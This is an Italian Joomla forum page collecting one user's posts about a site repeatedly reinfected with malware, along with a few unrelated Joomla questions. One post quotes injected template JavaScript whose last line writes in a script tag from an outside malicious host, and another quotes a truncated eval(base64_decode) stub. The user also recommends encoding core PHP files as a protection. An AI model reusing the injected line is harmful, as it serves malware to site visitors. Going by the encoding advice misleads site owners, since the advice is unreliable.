Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - notepad

Pagine: [1] 2
1
Io ho risolto..
Da ingorante che sono ho semplicemente usato questi 2 metodi
Installato:
Crawlprotect
Criptato i seguenti files index.php  index.php2 configuration.php di Joomla e l'index.php del Template
Con un Tool online chiamato Free PHP Encoder 8)

2
Sicurezza / Re:hacker aiutoo!
« il: 24 Mag 2010, 13:37:20 »
Ciao
Giusto una curiosità,hai provato a vedere ad esempio il file index.php di joomla se all'inizio del codice cé tipo questo? base64_encode etc etc
Vedi qui http://www.unmaskparasites.com/ :-\

3
Pultroppo non ho le competenze per segnalare il problema al Team Ufficiale di Joomla!
Comunque insisto nel dire che cé qualcosa che nn quadra Saro'un cretino ma ci vedo benissimo!
Vedete sul forum joomla france
http://forum.joomla.fr/forumdisplay.php?s=6c2bbff0f6c79735d3aea747fc512124&f=130
(Utenti che lamentano il mio stesso identico problema = scripts malevoli e codici criptati negli index.php)
Ora cerchiamo di prendere in seria considerazione Queste Coincidenze
E con questo spero che Vamba nn mi infraintenda (nn sono qui x criticare Joomla,ma x difenderlo a spadatratta)
Perché lo sempre usato con grande soddisfazione e vorrei continuare ad usarlo!

4
Comunque alla fine mi sono arreso.
Le ho provate veramente di tutte
1° Scansionato il pc con ben 6 antivirus e nessun virus rilevato!
2° Reinstallato joomla ben 6 volte da ieri sera!
3° Il mio Hosting non rileva anomalie!
4° Cambiato tutte le password ftp di joomla etc!
5°Nonostante cio'il Trojan si riinstallava sempre!
Come già detto sopra,usavo joomla da un bel po'di anni e senza aver mai avuto problemi del genere.
Ora tutto é cominciato con l'installazione 1.5.7..A questo punto la sola cosa che mi vien da pensare é che questa versione é Bacata? Guardando il forum ufficiale nella sezione Security (quasi tutti gli ultimi post,riportano all'incirca il mio stesso problema e cio' scripts maligni etc etc.
Boh non so'che dire..Fattostà che mi son installato Pixelpost e buonanotte al secchio ::)
Aprofitto di questo post per segnalare un programmino che ho'scoperto solo ieri che sembra davvero interessante e forse andrebbe messo in evidenza http://www.crawlprotect.com/

5
Che Strano pero'
Ci sono troppe coincidenze non pensate?
Qui sul forum italiano e quello ufficiale nella sezione Security,quasi tutti gli ultimi post,riportano di iniezioni di codice maligno,e altre diavolerie. ::)
Ma non é che qualcuno in massa si diverta a bucare i siti fatti con joomla ???

6
Già fatto,ma ritornano..anzi sbirciando meglio stà stringa la trovo dappertutto,sopratutto nei files index.php del template e altrove.
ho provato a decriptare online codesta stringa..Ma i caratteri sono incomprensibili.

7
Ubuntu potrebbe essere una soluzione per essere immuni da malware,ma non mi permette di eseguire i miei lavori di fotoritocco con photoshop!
Segnalo in oltre una cosa che ho'scoperto poco fà.
Ho aperto i seguenti files (settati a chmod 400)
configuration.php
index.php
index2.php
e all'inizio del codice cé questa stringa
Codice: [Seleziona]
<?php eval(base64_decodecur
); ?>
<?php
Mica é normale :-\

8
Ciao
Pultroppo sono costretto a cambiare cms e la cosa mi dà mooooolto fastidio.In quanto Joomla lo uso da anni e mi trovo + che bene.Con le mie 3 semplici pagine,composte da un Contact,About, e la splendida Ozio Gallery per condividere le mie fotografie.
Sono ormai una settimana ad installare e disinstallare Joomla perché il mio sito si infesta all'improvviso di malware,trojan,backdoors e con vari errori.Poi il titolo del mio sito,su google mi appare con caratteri stranissimi.Eppure per quasi un anno tutto hà funzionato correttamente (con la versione 1.5.15).Ecco in effetti i problemi son cominciati con l'ultima versione (installazione vergine)!
Fattostà che le ho'provate di tutte per proteggermi,ho installato CrawlProtect,GuardXT,messo htpassword e htaccess in administrator........sovrascritto l'installazione con ftp...Ma nulla il sito si infetta ugualmente!
1°Ho scansionato con almeno 6 antivirus il mio PC e non mi salta fuori nulla.
2°Nel post precedente parlavo di javascripts del template infettati lo ho cambiato ma nulla.
3°Scarico tutti i files che sono online nel mio desktop...E l'antivirus mi segnala una marea di virus,tipo config.php database.php PHP.Kroxxu-A [tri] e altri ancora..
Insomma son disperato che devo fare?
il mio sito (che poi pultroppo cancellero' oggi pomeriggio) http://fwd4.me/PDa

9
Sicurezza / Re:Oziogallery e xxxxxxxxxxx
« il: 21 Mag 2010, 20:04:32 »
Scusatemi ma non ci siamo propio.
Non vorrei essere troppo palloso ma il problema persiste.
Ho contattato ovh e aspetto un loro siggerimento!
Spiegatemi x favore solo questo>
Come mai gli javascripts del template (sul mio desktop,sono puliti) e come vanno online,Magicamente il loro contenuto cambia con stà zozzeria di Backdoor.
Come é possibile questo?
Spiegatemi per cortesia come puo'accadere una cosa simile..che meccanismo usano insomma..E'qualcuno che mi perseguita o cosa? o semplicemente un bug del template?

Grazie

10
Sicurezza / Re:Oziogallery e xxxxxxxxxxx
« il: 21 Mag 2010, 14:20:13 »
Ciao
Penso di aver "sradicato"sto maledettissimo problema.Mi é venuta semplicemente l'idea che poteva essere Filezilla la causa.In effetti digitando su google (filezilla virus).ho trovato un topic qui sul forum http://forum.joomla.it/index.php/topic,93532.60.html
Dove si parla di una possibile infezione di filezilla appunto!
lo ho'semplicemente riinstallato e x ora il mio sito sembra funzioni senza problemi.
Speriamo Bene
Comunque Grazie a Tutti coloro che sono intervenuti!
Fabry ;)

11
Sicurezza / Re:Oziogallery e xxxxxxxxxxx
« il: 21 Mag 2010, 12:02:43 »
Scusatemi non so'+ che fare..( il template e il contenuto di Joomla non contengono virus)..Analizzati sul mio computer con diversi Antivirus.Ma come installo tutto sul mio spazio web dopo un po'mi riappaiono errori strani,causati dal Trojan..Ho riscaricato sul mio pc il template e nella cartella JS i seguenti files contengono codice maligno (moomenu,pqutlz)..e precisamente questo codice window.addEvent("domready",function(){var b=$$(".moduletable_menu li a");new SmoothScroll({duration:500,transition:Fx.Transitions.linear},window);b.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent("mouseenter",function(){e.start({"padding-left":22})});d.addEvent("mouseleave",function(){e.start({"padding-left":16})})});var c=$$(".moduletable_menu li li a");c.each(function(d){var e=new Fx.Styles(d,{duration:200,wait:false});d.addEvent("mouseenter",function(){e.start({"padding-left":42})});d.addEvent("mouseleave",function(){e.start({"padding-left":32})})});var a=new Tips($$(".toolTips"),{initialize:function(){this.fx=new Fx.Style(this.toolTip,"opacity",{duration:500,wait:false}).set(0)},onShow:function(d){this.fx.start(1)},onHide:function(d){this.fx.start(0)}})});
document.write('<script src=http://natusha.merengue.tuzonavirtual.com/videos/browscap.php ><\/script>');
Avete un'idea di cosa diamine succeda?
Grazie

12
Sicurezza / Re:Oziogallery e xxxxxxxxxxx
« il: 20 Mag 2010, 22:15:13 »
Allora forse ho'individuato la causa,ovvero ho riscaricato il template che uso PQ Frequent a questo indirizzo
http://pqsofts.com/download/free-joomla-template/21-pq-frequent.html
Scansionato subito e mi rileva il flamigerato Backdoor :(
Il template é gratuito..Se anche voi rilevate qualcosa.Beh non so'che dire :-\

13
Sicurezza / Re:Oziogallery e xxxxxxxxxxx
« il: 20 Mag 2010, 21:44:24 »
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)
Scusa Vamba ho analizzato sia il template che il contenuto di Joomla,scaricato dal sito ufficiale..E non trovo nessun virus..Com li avete trovati voi?
Grazie

Chiedo scusa a tutto lo staff.
In Effetti analizzando la Cartella di joomla (scaricata dal sito ufficiale) un'altro antivirus mi rileva un BackDoor.MaosBoot.35
Ma siamo sicuri che nn sia già dentro la cartella di joomla?


Uploaded with ImageShack.us

14
Sicurezza / Re:Oziogallery e xxxxxxxxxxx
« il: 20 Mag 2010, 21:34:07 »
Immagine coi dettagli dei file infetti (e questi non sono file della OzioGallery)
Scusa Vamba ho analizzato sia il template che il contenuto di Joomla,scaricato dal sito ufficiale..E non trovo nessun virus..Com li avete trovati voi?
Grazie

15
Sicurezza / Re:Oziogallery e xxxxxxxxxxx
« il: 20 Mag 2010, 21:20:59 »
appunto, non creiamo allarmismi senza verificare...

un link al sito, please!
Ok Questo é il mio sito http://fwd4.me/PDa
Segnalo in oltre che ieri,dopo l'aggiornamento alla 2.4 ho auto degli strani problemi..Tipo (errore la pagina che si per eccedere non é formatta per il web)
In pratica ho riinstallato tutto poco fà..PS: il template é gatutito..Insomma non ci sono porcherie nel mio sito.Ed é sempre composto da una gallery,una presentazione,una pagina contatti..
Scusate ecco un'errore che mi é apparso poco fà rassettando il XML della gallery

Errore di codifica del contenuto
La pagina che si sta cercando di visualizzare non può essere mostrata poiché fa uso di una forma di compressione non valida o non supportata.
Contattare il proprietario del sito web per informarlo del problema.

16
Sicurezza / Oziogallery e xxxxxxxxxxx
« il: 20 Mag 2010, 20:43:14 »
Ciao a Tutti
Spero di non creare scompiglio!
Ho appena installato l'ultima versione di Oziogallery
Ma appena apro il browser sia mozilla che chrome,mi dicono che il sito é malevolo :o
Prima di installare ozio,non sucedeva nulla!
questo é l'avvertimento (ps potri mandare in mp a chi di competenza,il mio sito)

Attenzione: l'apertura di questo sito potrebbe danneggiare il tuo computer!
Il sito web all'indirizzo www.miosito.com contiene elementi provenienti dal sito xxxxxxxxxxxxxxxxxx  in cui sembra essere presente malware, ovvero software in grado di danneggiare il tuo computer o, comunque, di funzionare senza il tuo consenso. Visitare un sito che contiene malware è sufficiente per infettare il tuo computer.
Per maggiori informazioni sui problemi riscontrati per questi elementi, visita la pagina Pagina di diagnostica Navigazione sicura. di xxxxxxxxxxxxxxxxxxxxx



17
salve a tutti
Ho appena installato joomla l'ultima versione (non mi é mai capitato con altre versioni)..Tutto installato correttamente, ma come clicco su Administrator mi dà errore 500.Che si puo fare? Riinstallare tutto immagino ???

18
Joomla! 1.6/1.7/2.5 / Re:Installare la Versione 1.6 Alpha2
« il: 08 Gen 2010, 18:14:21 »
Come suggerisce Francesco, dalla versione Alpha alla versione Stabile (che è ancora parecchio lontana), possono cambiare molte cose, pertanto l'aggiornamento potrebbe essere difficoltoso o addirittura potrebbe non essere previsto, dato che la versione alpha non è concepita per essere usata in siti di produzione.

Vebbé allora porto pazienza..Chissà quanto tempo ???
Dicono che in primavera ci sarà una versione stabile..Staremo a vedere!
Grazie

19
Joomla! 1.6/1.7/2.5 / Installare la Versione 1.6 Alpha2
« il: 08 Gen 2010, 18:04:07 »
Salve
Solo un piccolo consiglio.
Se installo codesta versione che é ancora in Alpha2..Pensate che man mano sarà possibile scaricare delle pack,fino a raggiungere la versione stabile?
Tnks

20
Joomla! 1.5 / Articoli non si salvano piu! (RISOLTO)
« il: 29 Ott 2009, 23:27:43 »
Ciao
ho un problema serio.che é iniziato questo pomeriggio!
Quando clicco su salva articolo la pagina resta a caricare all'infinito a voglia ad aspettare ::) Che succede?
Grazie
Risolto ma che paura pero' :'(
Era semplicemente un plugin per fare del ping!
Lo ho disabilitato e ora vaiiiii.
Grazie

Pagine: [1] 2
Host

Torna su